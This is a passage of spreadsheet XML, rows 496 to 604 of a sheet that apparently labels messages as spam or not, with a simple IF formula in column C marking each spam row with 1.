        <f>IF(B496="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A497" t="s">
        <v>5783</v>
      </c>
      <c r="B497" t="s">
        <v>5294</v>
      </c>
      <c r="C497" s="1">
        <f>IF(B497="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A498" t="s">
        <v>5784</v>
      </c>
      <c r="B498" t="s">
        <v>5294</v>
      </c>
      <c r="C498" s="1">
        <f>IF(B498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A499" t="s">
        <v>5785</v>
      </c>
      <c r="B499" t="s">
        <v>5294</v>
      </c>
      <c r="C499" s="1">
        <f>IF(B499="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A500" t="s">
        <v>5786</v>
      </c>
      <c r="B500" t="s">
        <v>5294</v>
      </c>
      <c r="C500" s="1">
        <f>IF(B500="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A501" t="s">
        <v>5787</v>
      </c>
      <c r="B501" t="s">
        <v>5294</v>
      </c>
      <c r="C501" s="1">
        <f>IF(B501="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A502" t="s">
        <v>5788</v>
      </c>
      <c r="B502" t="s">
        <v>5294</v>
      </c>
      <c r="C502" s="1">
        <f>IF(B502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A503" t="s">
        <v>5789</v>
      </c>
      <c r="B503" t="s">
        <v>5294</v>
      </c>
      <c r="C503" s="1">
        <f>IF(B503="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A504" t="s">
        <v>5790</v>
      </c>
      <c r="B504" t="s">
        <v>5294</v>
      </c>
      <c r="C504" s="1">
        <f>IF(B504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A505" t="s">
        <v>5791</v>
      </c>
      <c r="B505" t="s">
        <v>5294</v>
      </c>
      <c r="C505" s="1">
        <f>IF(B505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A506" t="s">
        <v>5792</v>
      </c>
      <c r="B506" t="s">
        <v>5297</v>
      </c>
      <c r="C506" s="1">
        <f>IF(B506="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A507" t="s">
        <v>5793</v>
      </c>
      <c r="B507" t="s">
        <v>5294</v>
      </c>
      <c r="C507" s="1">
        <f>IF(B507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A508" t="s">
        <v>5794</v>
      </c>
      <c r="B508" t="s">
        <v>5294</v>
      </c>
      <c r="C508" s="1">
        <f>IF(B508="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A509" t="s">
        <v>5795</v>
      </c>
      <c r="B509" t="s">
        <v>5294</v>
      </c>
      <c r="C509" s="1">
        <f>IF(B509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A510" t="s">
        <v>5796</v>
      </c>
      <c r="B510" t="s">
        <v>5294</v>
      </c>
      <c r="C510" s="1">
        <f>IF(B510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A511" t="s">
        <v>5797</v>
      </c>
      <c r="B511" t="s">
        <v>5294</v>
      </c>
      <c r="C511" s="1">
        <f>IF(B511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A512" t="s">
        <v>5798</v>
      </c>
      <c r="B512" t="s">
        <v>5294</v>
      </c>
      <c r="C512" s="1">
        <f>IF(B512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A513" t="s">
        <v>5799</v>
      </c>
      <c r="B513" t="s">
        <v>5294</v>
      </c>
      <c r="C513" s="1">
        <f>IF(B513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A514" t="s">
        <v>5800</v>
      </c>
      <c r="B514" t="s">
        <v>5294</v>
      </c>
      <c r="C514" s="1">
        <f>IF(B514="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A515" t="s">
        <v>5801</v>
      </c>
      <c r="B515" t="s">
        <v>5294</v>
      </c>
      <c r="C515" s="1">
        <f>IF(B515="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A516" t="s">
        <v>5802</v>
      </c>
      <c r="B516" t="s">
        <v>5297</v>
      </c>
      <c r="C516" s="1">
        <f>IF(B516="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A517" t="s">
        <v>5803</v>
      </c>
      <c r="B517" t="s">
        <v>5294</v>
      </c>
      <c r="C517" s="1">
        <f>IF(B517="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A518" t="s">
        <v>5804</v>
      </c>
      <c r="B518" t="s">
        <v>5297</v>
      </c>
      <c r="C518" s="1">
        <f>IF(B518="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A519" t="s">
        <v>5805</v>
      </c>
      <c r="B519" t="s">
        <v>5297</v>
      </c>
      <c r="C519" s="1">
        <f>IF(B519="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A520" t="s">
        <v>5806</v>
      </c>
      <c r="B520" t="s">
        <v>5294</v>
      </c>
      <c r="C520" s="1">
        <f>IF(B520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A521" t="s">
        <v>5807</v>
      </c>
      <c r="B521" t="s">
        <v>5294</v>
      </c>
      <c r="C521" s="1">
        <f>IF(B521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A522" t="s">
        <v>5808</v>
      </c>
      <c r="B522" t="s">
        <v>5294</v>
      </c>
      <c r="C522" s="1">
        <f>IF(B522="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A523" t="s">
        <v>5809</v>
      </c>
      <c r="B523" t="s">
        <v>5294</v>
      </c>
      <c r="C523" s="1">
        <f>IF(B523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A524" t="s">
        <v>5810</v>
      </c>
      <c r="B524" t="s">
        <v>5294</v>
      </c>
      <c r="C524" s="1">
        <f>IF(B524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A525" t="s">
        <v>5811</v>
      </c>
      <c r="B525" t="s">
        <v>5294</v>
      </c>
      <c r="C525" s="1">
        <f>IF(B525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A526" t="s">
        <v>5812</v>
      </c>
      <c r="B526" t="s">
        <v>5297</v>
      </c>
      <c r="C526" s="1">
        <f>IF(B526="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A527" t="s">
        <v>5813</v>
      </c>
      <c r="B527" t="s">
        <v>5294</v>
      </c>
      <c r="C527" s="1">
        <f>IF(B527="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A528" t="s">
        <v>5814</v>
      </c>
      <c r="B528" t="s">
        <v>5297</v>
      </c>
      <c r="C528" s="1">
        <f>IF(B528="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A529" t="s">
        <v>5815</v>
      </c>
      <c r="B529" t="s">
        <v>5294</v>
      </c>
      <c r="C529" s="1">
        <f>IF(B529="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A530" t="s">
        <v>5816</v>
      </c>
      <c r="B530" t="s">
        <v>5297</v>
      </c>
      <c r="C530" s="1">
        <f>IF(B530="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A531" t="s">
        <v>5817</v>
      </c>
      <c r="B531" t="s">
        <v>5294</v>
      </c>
      <c r="C531" s="1">
        <f>IF(B531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A532" t="s">
        <v>5818</v>
      </c>
      <c r="B532" t="s">
        <v>5297</v>
      </c>
      <c r="C532" s="1">
        <f>IF(B532="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A533" t="s">
        <v>5819</v>
      </c>
      <c r="B533" t="s">
        <v>5294</v>
      </c>
      <c r="C533" s="1">
        <f>IF(B533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A534" t="s">
        <v>5635</v>
      </c>
      <c r="B534" t="s">
        <v>5294</v>
      </c>
      <c r="C534" s="1">
        <f>IF(B534="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A535" t="s">
        <v>5820</v>
      </c>
      <c r="B535" t="s">
        <v>5294</v>
      </c>
      <c r="C535" s="1">
        <f>IF(B535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A536" t="s">
        <v>5821</v>
      </c>
      <c r="B536" t="s">
        <v>5294</v>
      </c>
      <c r="C536" s="1">
        <f>IF(B536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A537" t="s">
        <v>5822</v>
      </c>
      <c r="B537" t="s">
        <v>5294</v>
      </c>
      <c r="C537" s="1">
        <f>IF(B537="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A538" t="s">
        <v>5823</v>
      </c>
      <c r="B538" t="s">
        <v>5294</v>
      </c>
      <c r="C538" s="1">
        <f>IF(B538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A539" t="s">
        <v>5824</v>
      </c>
      <c r="B539" t="s">
        <v>5294</v>
      </c>
      <c r="C539" s="1">
        <f>IF(B539="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A540" t="s">
        <v>5825</v>
      </c>
      <c r="B540" t="s">
        <v>5294</v>
      </c>
      <c r="C540" s="1">
        <f>IF(B540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A541" t="s">
        <v>5826</v>
      </c>
      <c r="B541" t="s">
        <v>5294</v>
      </c>
      <c r="C541" s="1">
        <f>IF(B541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A542" t="s">
        <v>5827</v>
      </c>
      <c r="B542" t="s">
        <v>5297</v>
      </c>
      <c r="C542" s="1">
        <f>IF(B542="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A543" t="s">
        <v>5828</v>
      </c>
      <c r="B543" t="s">
        <v>5294</v>
      </c>
      <c r="C543" s="1">
        <f>IF(B543="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A544" t="s">
        <v>5829</v>
      </c>
      <c r="B544" t="s">
        <v>5294</v>
      </c>
      <c r="C544" s="1">
        <f>IF(B544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A545" t="s">
        <v>5830</v>
      </c>
      <c r="B545" t="s">
        <v>5294</v>
      </c>
      <c r="C545" s="1">
        <f>IF(B545="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A546" t="s">
        <v>5831</v>
      </c>
      <c r="B546" t="s">
        <v>5294</v>
      </c>
      <c r="C546" s="1">
        <f>IF(B546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A547" t="s">
        <v>5832</v>
      </c>
      <c r="B547" t="s">
        <v>5294</v>
      </c>
      <c r="C547" s="1">
        <f>IF(B547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A548" t="s">
        <v>5833</v>
      </c>
      <c r="B548" t="s">
        <v>5294</v>
      </c>
      <c r="C548" s="1">
        <f>IF(B548="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A549" t="s">
        <v>5834</v>
      </c>
      <c r="B549" t="s">
        <v>5294</v>
      </c>
      <c r="C549" s="1">
        <f>IF(B549="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A550" t="s">
        <v>5835</v>
      </c>
      <c r="B550" t="s">
        <v>5294</v>
      </c>
      <c r="C550" s="1">
        <f>IF(B550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A551" t="s">
        <v>5836</v>
      </c>
      <c r="B551" t="s">
        <v>5294</v>
      </c>
      <c r="C551" s="1">
        <f>IF(B551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A552" t="s">
        <v>5837</v>
      </c>
      <c r="B552" t="s">
        <v>5294</v>
      </c>
      <c r="C552" s="1">
        <f>IF(B552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A553" t="s">
        <v>5838</v>
      </c>
      <c r="B553" t="s">
        <v>5294</v>
      </c>
      <c r="C553" s="1">
        <f>IF(B553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A554" t="s">
        <v>5839</v>
      </c>
      <c r="B554" t="s">
        <v>5294</v>
      </c>
      <c r="C554" s="1">
        <f>IF(B554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A555" t="s">
        <v>5840</v>
      </c>
      <c r="B555" t="s">
        <v>5294</v>
      </c>
      <c r="C555" s="1">
        <f>IF(B555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A556" t="s">
        <v>5841</v>
      </c>
      <c r="B556" t="s">
        <v>5294</v>
      </c>
      <c r="C556" s="1">
        <f>IF(B556="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A557" t="s">
        <v>5842</v>
      </c>
      <c r="B557" t="s">
        <v>5294</v>
      </c>
      <c r="C557" s="1">
        <f>IF(B557="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A558" t="s">
        <v>5843</v>
      </c>
      <c r="B558" t="s">
        <v>5294</v>
      </c>
      <c r="C558" s="1">
        <f>IF(B558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A559" t="s">
        <v>5844</v>
      </c>
      <c r="B559" t="s">
        <v>5294</v>
      </c>
      <c r="C559" s="1">
        <f>IF(B559="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A560" t="s">
        <v>5845</v>
      </c>
      <c r="B560" t="s">
        <v>5294</v>
      </c>
      <c r="C560" s="1">
        <f>IF(B560="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A561" t="s">
        <v>5846</v>
      </c>
      <c r="B561" t="s">
        <v>5294</v>
      </c>
      <c r="C561" s="1">
        <f>IF(B561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A562" t="s">
        <v>5847</v>
      </c>
      <c r="B562" t="s">
        <v>5294</v>
      </c>
      <c r="C562" s="1">
        <f>IF(B562="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A563" t="s">
        <v>5848</v>
      </c>
      <c r="B563" t="s">
        <v>5294</v>
      </c>
      <c r="C563" s="1">
        <f>IF(B563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A564" t="s">
        <v>5849</v>
      </c>
      <c r="B564" t="s">
        <v>5294</v>
      </c>
      <c r="C564" s="1">
        <f>IF(B564="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A565" t="s">
        <v>5850</v>
      </c>
      <c r="B565" t="s">
        <v>5297</v>
      </c>
      <c r="C565" s="1">
        <f>IF(B565="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A566" t="s">
        <v>5851</v>
      </c>
      <c r="B566" t="s">
        <v>5294</v>
      </c>
      <c r="C566" s="1">
        <f>IF(B566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A567" t="s">
        <v>5852</v>
      </c>
      <c r="B567" t="s">
        <v>5294</v>
      </c>
      <c r="C567" s="1">
        <f>IF(B567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A568" t="s">
        <v>5853</v>
      </c>
      <c r="B568" t="s">
        <v>5294</v>
      </c>
      <c r="C568" s="1">
        <f>IF(B568="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A569" t="s">
        <v>5854</v>
      </c>
      <c r="B569" t="s">
        <v>5294</v>
      </c>
      <c r="C569" s="1">
        <f>IF(B569="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A570" t="s">
        <v>5855</v>
      </c>
      <c r="B570" t="s">
        <v>5294</v>
      </c>
      <c r="C570" s="1">
        <f>IF(B570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A571" t="s">
        <v>5856</v>
      </c>
      <c r="B571" t="s">
        <v>5294</v>
      </c>
      <c r="C571" s="1">
        <f>IF(B571="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A572" t="s">
        <v>5857</v>
      </c>
      <c r="B572" t="s">
        <v>5294</v>
      </c>
      <c r="C572" s="1">
        <f>IF(B572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A573" t="s">
        <v>5858</v>
      </c>
      <c r="B573" t="s">
        <v>5294</v>
      </c>
      <c r="C573" s="1">
        <f>IF(B573="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A574" t="s">
        <v>5859</v>
      </c>
      <c r="B574" t="s">
        <v>5294</v>
      </c>
      <c r="C574" s="1">
        <f>IF(B574="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A575" t="s">
        <v>5860</v>
      </c>
      <c r="B575" t="s">
        <v>5294</v>
      </c>
      <c r="C575" s="1">
        <f>IF(B575="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A576" t="s">
        <v>5861</v>
      </c>
      <c r="B576" t="s">
        <v>5294</v>
      </c>
      <c r="C576" s="1">
        <f>IF(B576="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A577" t="s">
        <v>5862</v>
      </c>
      <c r="B577" t="s">
        <v>5297</v>
      </c>
      <c r="C577" s="1">
        <f>IF(B577="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A578" t="s">
        <v>5863</v>
      </c>
      <c r="B578" t="s">
        <v>5294</v>
      </c>
      <c r="C578" s="1">
        <f>IF(B578="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A579" t="s">
        <v>5864</v>
      </c>
      <c r="B579" t="s">
        <v>5294</v>
      </c>
      <c r="C579" s="1">
        <f>IF(B579="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A580" t="s">
        <v>5865</v>
      </c>
      <c r="B580" t="s">
        <v>5297</v>
      </c>
      <c r="C580" s="1">
        <f>IF(B580="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A581" t="s">
        <v>5866</v>
      </c>
      <c r="B581" t="s">
        <v>5294</v>
      </c>
      <c r="C581" s="1">
        <f>IF(B581="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A582" t="s">
        <v>5867</v>
      </c>
      <c r="B582" t="s">
        <v>5294</v>
      </c>
      <c r="C582" s="1">
        <f>IF(B582="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A583" t="s">
        <v>5868</v>
      </c>
      <c r="B583" t="s">
        <v>5294</v>
      </c>
      <c r="C583" s="1">
        <f>IF(B583="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A584" t="s">
        <v>5869</v>
      </c>
      <c r="B584" t="s">
        <v>5297</v>
      </c>
      <c r="C584" s="1">
        <f>IF(B584="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A585" t="s">
        <v>5870</v>
      </c>
      <c r="B585" t="s">
        <v>5294</v>
      </c>
      <c r="C585" s="1">
        <f>IF(B585="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A586" t="s">
        <v>5871</v>
      </c>
      <c r="B586" t="s">
        <v>5294</v>
      </c>
      <c r="C586" s="1">
        <f>IF(B586="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A587" t="s">
        <v>5872</v>
      </c>
      <c r="B587" t="s">
        <v>5294</v>
      </c>
      <c r="C587" s="1">
        <f>IF(B587="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A588" t="s">
        <v>5873</v>
      </c>
      <c r="B588" t="s">
        <v>5294</v>
      </c>
      <c r="C588" s="1">
        <f>IF(B588="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A589" t="s">
        <v>5874</v>
      </c>
      <c r="B589" t="s">
        <v>5294</v>
      </c>
      <c r="C589" s="1">
        <f>IF(B589="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A590" t="s">
        <v>5875</v>
      </c>
      <c r="B590" t="s">
        <v>5294</v>
      </c>
      <c r="C590" s="1">
        <f>IF(B590="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A591" t="s">
        <v>5876</v>
      </c>
      <c r="B591" t="s">
        <v>5294</v>
      </c>
      <c r="C591" s="1">
        <f>IF(B591="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A592" t="s">
        <v>5877</v>
      </c>
      <c r="B592" t="s">
        <v>5297</v>
      </c>
      <c r="C592" s="1">
        <f>IF(B592="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A593" t="s">
        <v>5878</v>
      </c>
      <c r="B593" t="s">
        <v>5297</v>
      </c>
      <c r="C593" s="1">
        <f>IF(B593="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A594" t="s">
        <v>5879</v>
      </c>
      <c r="B594" t="s">
        <v>5297</v>
      </c>
      <c r="C594" s="1">
        <f>IF(B594="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A595" t="s">
        <v>5880</v>
      </c>
      <c r="B595" t="s">
        <v>5294</v>
      </c>
      <c r="C595" s="1">
        <f>IF(B595="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A596" t="s">
        <v>5881</v>
      </c>
      <c r="B596" t="s">
        <v>5294</v>
      </c>
      <c r="C596" s="1">
        <f>IF(B596="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A597" t="s">
        <v>5882</v>
      </c>
      <c r="B597" t="s">
        <v>5294</v>
      </c>
      <c r="C597" s="1">
        <f>IF(B597="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A598" t="s">
        <v>5883</v>
      </c>
      <c r="B598" t="s">
        <v>5294</v>
      </c>
      <c r="C598" s="1">
        <f>IF(B598="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A599" t="s">
        <v>5884</v>
      </c>
      <c r="B599" t="s">
        <v>5297</v>
      </c>
      <c r="C599" s="1">
        <f>IF(B599="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A600" t="s">
        <v>5885</v>
      </c>
      <c r="B600" t="s">
        <v>5294</v>
      </c>
      <c r="C600" s="1">
        <f>IF(B600="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A601" t="s">
        <v>5886</v>
      </c>
      <c r="B601" t="s">
        <v>5294</v>
      </c>
      <c r="C601" s="1">
        <f>IF(B601="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A602" t="s">
        <v>5887</v>
      </c>
      <c r="B602" t="s">
        <v>5294</v>
      </c>
      <c r="C602" s="1">
        <f>IF(B602="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A603" t="s">
        <v>5888</v>
      </c>
      <c r="B603" t="s">
        <v>5294</v>
      </c>
      <c r="C603" s="1">
        <f>IF(B603="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A604" t="s">
        <v>5889</v>
      </c>
      <c r="B604" t="s">
        <v>5294</v>
      </c>
